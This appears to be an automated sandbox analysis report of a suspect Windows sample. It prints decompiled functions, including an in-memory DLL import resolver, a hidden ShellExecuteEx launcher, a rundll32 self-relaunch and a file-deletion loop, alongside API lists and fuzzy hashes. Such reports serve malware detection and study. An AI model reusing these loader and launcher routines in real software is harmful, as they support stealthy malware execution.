                                                                                                                        0x6f3317df
                                                                                                                        0x6f3317e7
                                                                                                                        0x6f3317ef
                                                                                                                        0x6f3317ef
                                                                                                                        0x6f3317f5
                                                                                                                        0x00000000
                                                                                                                        0x6f3317f5
                                                                                                                        0x6f3317bd
                                                                                                                        0x00000000
                                                                                                                        0x6f33178b
                                                                                                                        0x6f3318ba
                                                                                                                        0x6f3318ba
                                                                                                                        0x6f331752
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 6F33176D
                                                                                                                        • GetProcessHeap.KERNEL32(00000008), ref: 6F3317B0
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3317B3
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 6F3317DA
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 6F3317EC
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F3317EF
                                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 6F33185F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AddressAllocFreeLibraryLoadMemoryMoveProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2239585089-0
                                                                                                                        • Opcode ID: 7b2e3cdfbba2c410e3b28f0084f4e3715afce06fa7edaab036c5e0ed8c34dfc8
                                                                                                                        • Instruction ID: ea0467e0b8c6b71df47d3204a102e90d60006ee14d2fb1e978779f0e02a6d6fc
                                                                                                                        • Opcode Fuzzy Hash: 7b2e3cdfbba2c410e3b28f0084f4e3715afce06fa7edaab036c5e0ed8c34dfc8
                                                                                                                        • Instruction Fuzzy Hash: 02416076F007569BEB14EF68D8447A6B7A9FF44315F04862AE828CB341E735F814CBA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00555326, Relevance: 10.6, APIs: 7, Instructions: 124COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __mtinitlocknum.LIBCMT ref: 0055533D
                                                                                                                          • Part of subcall function 00544539: __FF_MSGBANNER.LIBCMT ref: 00544555
                                                                                                                        • __lock.LIBCMT ref: 00555351
                                                                                                                        • __lock.LIBCMT ref: 0055539A
                                                                                                                        • ___crtInitCritSecAndSpinCount.LIBCMT ref: 005553B5
                                                                                                                        • EnterCriticalSection.KERNEL32(?,007D5F28,00000018,005576D5,?,00000000,00000109), ref: 005553DB
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 005553E8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection__lock$CountCritEnterInitLeaveSpin___crt__mtinitlocknum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2236623020-0
                                                                                                                        • Opcode ID: 75efc9a076f0ff99eb1508f29c16bfe3a0046184fb8130b5b5b9b267a986f4eb
                                                                                                                        • Instruction ID: 0acc2d46530a689c0f3af0a0911e42c1ecb00f31fcb1a829b0c863d890cfecbe
                                                                                                                        • Opcode Fuzzy Hash: 75efc9a076f0ff99eb1508f29c16bfe3a0046184fb8130b5b5b9b267a986f4eb
                                                                                                                        • Instruction Fuzzy Hash: CE415930904B02CBDF208FA8D86939DBFE07F41337F25862EE525961D1E7B49988CB10
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33175E, Relevance: 10.6, APIs: 7, Instructions: 98memorylibraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33175E(intOrPtr __eax, void* __edi, intOrPtr* _a12, struct HINSTANCE__* _a16) {
				intOrPtr _t34;
				struct HINSTANCE__* _t35;
				signed int _t37;
				intOrPtr _t38;
				signed short _t39;
				CHAR* _t41;
				_Unknown_base(*)()* _t43;
				signed int _t45;
				signed int _t46;
				signed int _t47;
				signed int _t51;
				void* _t52;
				intOrPtr* _t57;
				signed short* _t59;
				intOrPtr _t65;
				intOrPtr* _t68;
				void* _t73;
				signed short* _t76;
				void* _t81;
				signed short _t103;

				_t73 = __edi;
				_t34 = __eax;
				while(1) {
					_t57 = _a12;
					_t35 = LoadLibraryA( *((intOrPtr*)(_t73 + 0x144)) + _t34);
					_a16 = _t35;
					if(_t35 == 0) {
						break;
					}
					_t37 =  *(_t73 + 0x154);
					if( *(_t73 + 0x150) < _t37) {
						L13:
						if(_t81 != 0) {
							_t45 =  *(_t73 + 0x150);
							_t46 = _t45 + 1;
							 *(_t73 + 0x150) = _t46;
							if( *((intOrPtr*)(_t81 + _t45 * 4)) != 0) {
								 *((intOrPtr*)(_t81 + _t46 * 4)) = _a16;
								 *(_t73 + 0x150) =  *(_t73 + 0x150) + 1;
							}
						}
						_t38 =  *((intOrPtr*)(_t73 + 0x144));
						_t68 = _a12;
						_t76 =  *((intOrPtr*)(_t57 + 0x10)) + _t38;
						_t59 = _t76;
						if( *((intOrPtr*)(_t68 + 4)) == 0) {
							L19:
							_t39 =  *_t59;
							_t103 = _t39;
							if(_t103 == 0) {
								L26:
								_t34 =  *((intOrPtr*)(_t68 + 0x20));
								_a12 = _t68 + 0x14;
								if(_t34 != 0) {
									continue;
								} else {
									return 0;
								}
							} else {
								L20:
								L20:
								if(_t103 >= 0) {
									_t41 = _t39 +  *((intOrPtr*)(_t73 + 0x144)) + 2;
								} else {
									_t41 = _t39 & 0x0000ffff;
								}
								_t43 = GetProcAddress(_a16, _t41);
								 *_t76 = _t43;
								if(_t43 == 0) {
									break;
								}
								_t39 = _t59[2];
								_t59 =  &(_t59[2]);
								_t76 =  &(_t76[2]);
								if(_t39 != 0) {
									goto L20;
								} else {
									_t68 = _a12;
									goto L26;
								}
							}
						} else {
							_t65 =  *_t68;
							if(_t65 == 0) {
								return 8;
							} else {
								_t59 = _t65 + _t38;
								goto L19;
							}
						}
					} else {
						if(_t37 == 0) {
							_t47 = 0x10;
						} else {
							_t47 = _t37 + _t37;
						}
						 *(_t73 + 0x154) = _t47;
						_t81 = HeapAlloc(GetProcessHeap(), 8, _t47 * 4);
						if(_t81 == 0) {
							return 3;
						} else {
							_t51 =  *(_t73 + 0x150);
							if(_t51 != 0) {
								RtlMoveMemory(_t81,  *(_t73 + 0x14c), _t51 + _t51 + _t51 + _t51);
							}
							_t52 =  *(_t73 + 0x14c);
							if(_t52 != 0) {
								HeapFree(GetProcessHeap(), 0, _t52);
							}
							 *(_t73 + 0x14c) = _t81;
							goto L13;
						}
					}
					L31:
				}
				return 6;
				goto L31;
			}























                                                                                                                        0x6f33175e
                                                                                                                        0x6f33175e
                                                                                                                        0x6f331760
                                                                                                                        0x6f331760
                                                                                                                        0x6f33176d
                                                                                                                        0x6f331773
                                                                                                                        0x6f331779
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33177f
                                                                                                                        0x6f33178b
                                                                                                                        0x6f3317fb
                                                                                                                        0x6f3317fd
                                                                                                                        0x6f3317ff
                                                                                                                        0x6f331809
                                                                                                                        0x6f33180a
                                                                                                                        0x6f331812
                                                                                                                        0x6f331818
                                                                                                                        0x6f33181c
                                                                                                                        0x6f33181c
                                                                                                                        0x6f331812
                                                                                                                        0x6f331825
                                                                                                                        0x6f33182b
                                                                                                                        0x6f33182f
                                                                                                                        0x6f331835
                                                                                                                        0x6f331837
                                                                                                                        0x6f331842
                                                                                                                        0x6f331842
                                                                                                                        0x6f331844
                                                                                                                        0x6f331846
                                                                                                                        0x6f33187c
                                                                                                                        0x6f33187c
                                                                                                                        0x6f331882
                                                                                                                        0x6f331888
                                                                                                                        0x00000000
                                                                                                                        0x6f33188e
                                                                                                                        0x6f331896
                                                                                                                        0x6f331896
                                                                                                                        0x6f331848
                                                                                                                        0x00000000
                                                                                                                        0x6f331848
                                                                                                                        0x6f331848
                                                                                                                        0x6f331855
                                                                                                                        0x6f33184a
                                                                                                                        0x6f33184a
                                                                                                                        0x6f33184a
                                                                                                                        0x6f33185f
                                                                                                                        0x6f331865
                                                                                                                        0x6f331869
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33186b
                                                                                                                        0x6f33186e
                                                                                                                        0x6f331871
                                                                                                                        0x6f331876
                                                                                                                        0x00000000
                                                                                                                        0x6f331878
                                                                                                                        0x6f331878
                                                                                                                        0x00000000
                                                                                                                        0x6f331878
                                                                                                                        0x6f331876
                                                                                                                        0x6f331839
                                                                                                                        0x6f331839
                                                                                                                        0x6f33183d
                                                                                                                        0x6f3318ae
                                                                                                                        0x6f33183f
                                                                                                                        0x6f33183f
                                                                                                                        0x00000000
                                                                                                                        0x6f33183f
                                                                                                                        0x6f33183d
                                                                                                                        0x6f33178d
                                                                                                                        0x6f33178f
                                                                                                                        0x6f331795
                                                                                                                        0x6f331791
                                                                                                                        0x6f331791
                                                                                                                        0x6f331791
                                                                                                                        0x6f3317aa
                                                                                                                        0x6f3317b9
                                                                                                                        0x6f3317bd
                                                                                                                        0x6f3318a2
                                                                                                                        0x6f3317c3
                                                                                                                        0x6f3317c3
                                                                                                                        0x6f3317cb
                                                                                                                        0x6f3317da
                                                                                                                        0x6f3317da
                                                                                                                        0x6f3317df
                                                                                                                        0x6f3317e7
                                                                                                                        0x6f3317ef
                                                                                                                        0x6f3317ef
                                                                                                                        0x6f3317f5
                                                                                                                        0x00000000
                                                                                                                        0x6f3317f5
                                                                                                                        0x6f3317bd
                                                                                                                        0x00000000
                                                                                                                        0x6f33178b
                                                                                                                        0x6f3318ba
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 6F33176D
                                                                                                                        • GetProcessHeap.KERNEL32(00000008), ref: 6F3317B0
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3317B3
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 6F3317DA
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 6F3317EC
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F3317EF
                                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 6F33185F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AddressAllocFreeLibraryLoadMemoryMoveProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2239585089-0
                                                                                                                        • Opcode ID: db9839d13b1418abeecf09bdf88284fc3d6eefcaade1963ca226438f7356772e
                                                                                                                        • Instruction ID: d48dca3991ae4241c46d5425f78c2810b2c10174371ae7538861a01c2598590e
                                                                                                                        • Opcode Fuzzy Hash: db9839d13b1418abeecf09bdf88284fc3d6eefcaade1963ca226438f7356772e
                                                                                                                        • Instruction Fuzzy Hash: E0315E76F007969BE704EF68D8447A6B7A9FF48355F048629E829CB301EB31F811CB90
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004F851D, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 78COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch_GS.LIBCMT ref: 004F8524
                                                                                                                          • Part of subcall function 004B69A2: __EH_prolog3.LIBCMT ref: 004B69A9
                                                                                                                          • Part of subcall function 004ADA55: __EH_prolog3.LIBCMT ref: 004ADA60
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$H_prolog3_catch_
                                                                                                                        • String ID: Yu$ Yu$Validation of saved private key failed!$XYu$XYu
                                                                                                                        • API String ID: 2899319929-463955292
                                                                                                                        • Opcode ID: 141b135ca1fb09dd15b83df456b4f14438a2b17374786b570038f1be33776f45
                                                                                                                        • Instruction ID: 23615aed599726b50c28bfde34f034c51c69683924d87b2994db35aaa23e3029
                                                                                                                        • Opcode Fuzzy Hash: 141b135ca1fb09dd15b83df456b4f14438a2b17374786b570038f1be33776f45
                                                                                                                        • Instruction Fuzzy Hash: F321B774504148AADF14FF958956EAE7B75FF86314F01409DF252EB282CE381A09DB26
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F334230, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 92%
                                                                                                                        			E6F334230(intOrPtr _a4, intOrPtr _a8, DWORD* _a12) {
				intOrPtr _v0;
				intOrPtr _v4;
				struct _SHELLEXECUTEINFOA _v68;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				int _t25;
				DWORD* _t27;
				int _t35;
				signed int _t38;
				long _t40;

				_push(0x3c);
				_push( &(_v68.hwnd));
				L6F33C2EE();
				_t22 = _v0;
				_v68.cbSize = 0x3c;
				_v68.fMask = 0x800400;
				_v68.nShow = 0;
				if(_t22 != 0) {
					_v68.lpFile = _t22;
				}
				_t23 = _a4;
				if(_t23 != 0) {
					_v68.lpParameters = _t23;
				}
				_t24 = _v4;
				if(_t24 != 0) {
					_v68.lpVerb = _t24;
				}
				if(_a8 == 0) {
					_v68.fMask = 0x808400;
				} else {
					_v68.nShow = 1;
				}
				_t38 = _a12;
				if(_t38 != 0) {
					_v68.fMask = _v68.fMask | 0x00000040;
				}
				_t25 = ShellExecuteExA( &_v68);
				_t35 = _t25;
				if(_t35 != 0 && _t38 != 0) {
					if(_t38 == 0xffffffff) {
						_t40 = _t38 | 0xffffffff;
					} else {
						_t40 = _t38 * 0x3e8;
					}
					WaitForSingleObject(_v68.hIcon, _t40);
					_t27 = _a12;
					if(_t27 != 0) {
						GetExitCodeProcess(_v68.hIcon, _t27);
					}
					CloseHandle(_v68.hIcon);
					_t25 = _t35;
				}
				return _t25;
			}














                                                                                                                        0x6f334233
                                                                                                                        0x6f334239
                                                                                                                        0x6f33423a
                                                                                                                        0x6f33423f
                                                                                                                        0x6f334243
                                                                                                                        0x6f33424a
                                                                                                                        0x6f334252
                                                                                                                        0x6f33425c
                                                                                                                        0x6f33425e
                                                                                                                        0x6f33425e
                                                                                                                        0x6f334262
                                                                                                                        0x6f334268
                                                                                                                        0x6f33426a
                                                                                                                        0x6f33426a
                                                                                                                        0x6f33426e
                                                                                                                        0x6f334274
                                                                                                                        0x6f334276
                                                                                                                        0x6f334276
                                                                                                                        0x6f33427f
                                                                                                                        0x6f33428b
                                                                                                                        0x6f334281
                                                                                                                        0x6f334281
                                                                                                                        0x6f334281
                                                                                                                        0x6f334294
                                                                                                                        0x6f33429b
                                                                                                                        0x6f33429d
                                                                                                                        0x6f33429d
                                                                                                                        0x6f3342a7
                                                                                                                        0x6f3342ad
                                                                                                                        0x6f3342b1
                                                                                                                        0x6f3342ba
                                                                                                                        0x6f3342c4
                                                                                                                        0x6f3342bc
                                                                                                                        0x6f3342bc
                                                                                                                        0x6f3342bc
                                                                                                                        0x6f3342cd
                                                                                                                        0x6f3342d3
                                                                                                                        0x6f3342d9
                                                                                                                        0x6f3342e1
                                                                                                                        0x6f3342e1
                                                                                                                        0x6f3342ec
                                                                                                                        0x6f3342f2
                                                                                                                        0x6f3342f2
                                                                                                                        0x6f3342f9

                                                                                                                        APIs
                                                                                                                        • RtlZeroMemory.NTDLL(0000003C,0000003C), ref: 6F33423A
                                                                                                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000000), ref: 6F3342A7
                                                                                                                        • WaitForSingleObject.KERNEL32(?,?), ref: 6F3342CD
                                                                                                                        • GetExitCodeProcess.KERNEL32 ref: 6F3342E1
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6F3342EC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCodeExecuteExitHandleMemoryObjectProcessShellSingleWaitZero
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 1639083440-2766056989
                                                                                                                        • Opcode ID: 93814b0b1793294fe0fe26721a22d68b433e192926ed57a498fa880293b5a424
                                                                                                                        • Instruction ID: 9fd273de62ff93ce936e8f54bf83aa43079eeafee47608e2d9efb4b00d4676af
                                                                                                                        • Opcode Fuzzy Hash: 93814b0b1793294fe0fe26721a22d68b433e192926ed57a498fa880293b5a424
                                                                                                                        • Instruction Fuzzy Hash: AC216F729097A19BD710CF69C544B5BBBE8BB89710F008A1EF9A4E3280D777D804CF52
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F335190, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 70%
                                                                                                                        			E6F335190(intOrPtr _a4) {
				char _v772;
				char _v780;
				void* _t4;
				char* _t5;
				char _t6;
				intOrPtr _t11;
				CHAR* _t14;

				_t11 = _a4;
				if(_t11 != 0x65 ||  *0x6f34027c >= 6 && M6F340544 == 0 && M6F340548 != 0) {
					_t4 = OpenEventA(2, 0, "TVRF_Instance");
					if(_t4 == 0) {
						_t5 = M6F340530; // 0xa32c28
						_t14 = M6F340524; // 0xa56118
						_t6 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa4de08
						wsprintfA( &_v780, "\"%s%s\" \"%s\",#%d %c \"%s\"", _t6, "rundll32.exe", _t14, 0x195, _t11, _t5);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						return E6F334EF0( &_v772, 1, 0);
					} else {
						CloseHandle(_t4);
						goto L6;
					}
				} else {
					L6:
					return 0;
				}
			}










                                                                                                                        0x6f335197
                                                                                                                        0x6f3351a1
                                                                                                                        0x6f3351c7
                                                                                                                        0x6f3351cf
                                                                                                                        0x6f3351e2
                                                                                                                        0x6f3351e7
                                                                                                                        0x6f3351ee
                                                                                                                        0x6f33520d
                                                                                                                        0x6f335213
                                                                                                                        0x6f335215
                                                                                                                        0x6f335217
                                                                                                                        0x6f335219
                                                                                                                        0x6f335233
                                                                                                                        0x6f3351d1
                                                                                                                        0x6f3351d2
                                                                                                                        0x00000000
                                                                                                                        0x6f3351d2
                                                                                                                        0x6f3351d8
                                                                                                                        0x6f3351d8
                                                                                                                        0x6f3351e1
                                                                                                                        0x6f3351e1

                                                                                                                        APIs
                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,TVRF_Instance,?), ref: 6F3351C7
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F3351D2
                                                                                                                        • wsprintfA.USER32 ref: 6F33520D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEventHandleOpenwsprintf
                                                                                                                        • String ID: "%s%s" "%s",#%d %c "%s"$TVRF_Instance$rundll32.exe
                                                                                                                        • API String ID: 3063877008-2939335533
                                                                                                                        • Opcode ID: b045e211195f4a2e71a1049b1ed422b6b787e831a5b37690626b1419245d3e0c
                                                                                                                        • Instruction ID: 6cbb97e43f4a80142bbc268f1e261c37de654f333b52529154985c0ec639c8af
                                                                                                                        • Opcode Fuzzy Hash: b045e211195f4a2e71a1049b1ed422b6b787e831a5b37690626b1419245d3e0c
                                                                                                                        • Instruction Fuzzy Hash: 1601F2B2E94791ABEF60E724CC55BA237AEE755725F40120CF824851D0E679A168CB22
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F332E59, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F332E59(struct _WIN32_FIND_DATAA _a16, char _a60, char _a336, char _a344) {
				signed char _t9;
				CHAR* _t16;
				void* _t18;
				void* _t23;
				void* _t28;

				do {
					_t9 = _a16.dwFileAttributes;
					if((_t9 & 0x00000010) == 0 && _t9 != 0) {
						wsprintfA( &_a336, "%s%s", _t18,  &_a60);
						_t28 = _t28 + 0x10;
						_t16 = DeleteFileA( &_a344);
						if(_t16 == 0) {
							MoveFileExA( &_a344, _t16, 4);
						}
					}
				} while (FindNextFileA(_t23,  &_a16) != 0);
				FindClose(_t23);
				return 1;
			}








                                                                                                                        0x6f332e60
                                                                                                                        0x6f332e60
                                                                                                                        0x6f332e66
                                                                                                                        0x6f332e7f
                                                                                                                        0x6f332e81
                                                                                                                        0x6f332e8c
                                                                                                                        0x6f332e94
                                                                                                                        0x6f332ea1
                                                                                                                        0x6f332ea1
                                                                                                                        0x6f332ea7
                                                                                                                        0x6f332eb8
                                                                                                                        0x6f332ebd
                                                                                                                        0x6f332ecf

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Find$CloseDeleteMoveNextwsprintf
                                                                                                                        • String ID: %s%s
                                                                                                                        • API String ID: 2350977733-3252725368
                                                                                                                        • Opcode ID: 0a064f2c1c9305de79f711fe0e148262895fa60d3bf8f0f154ac57577debe10b
                                                                                                                        • Instruction ID: a3a286cadaac2dc96a2b7dabb0799e1fb389ab9fab46922d5442e8941c6f4190
                                                                                                                        • Opcode Fuzzy Hash: 0a064f2c1c9305de79f711fe0e148262895fa60d3bf8f0f154ac57577debe10b
                                                                                                                        • Instruction Fuzzy Hash: 1BF04F73A04395ABD760DAA4CC49FEB73ADEF85721F40081DF994D6200EB76E1149692
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F334A20, Relevance: 9.2, APIs: 6, Instructions: 192commemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 38%
                                                                                                                        			E6F334A20() {
				char _v4;
				char _v12;
				char _v16;
				intOrPtr _v32;
				intOrPtr* _v36;
				char _v40;
				char _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr* _v56;
				intOrPtr* _v60;
				intOrPtr _v64;
				intOrPtr* _v68;
				char _v72;
				intOrPtr* _v76;
				char _v80;
				intOrPtr* _v84;
				char _v88;
				intOrPtr* _v100;
				char _v104;
				intOrPtr* _v108;
				intOrPtr* _v124;
				intOrPtr _v128;
				intOrPtr* _v132;
				intOrPtr* _v136;
				intOrPtr _v140;
				intOrPtr* _v148;
				intOrPtr* _t67;
				intOrPtr* _t70;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t84;
				intOrPtr* _t87;
				intOrPtr* _t89;
				intOrPtr* _t94;
				intOrPtr* _t97;
				intOrPtr* _t99;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
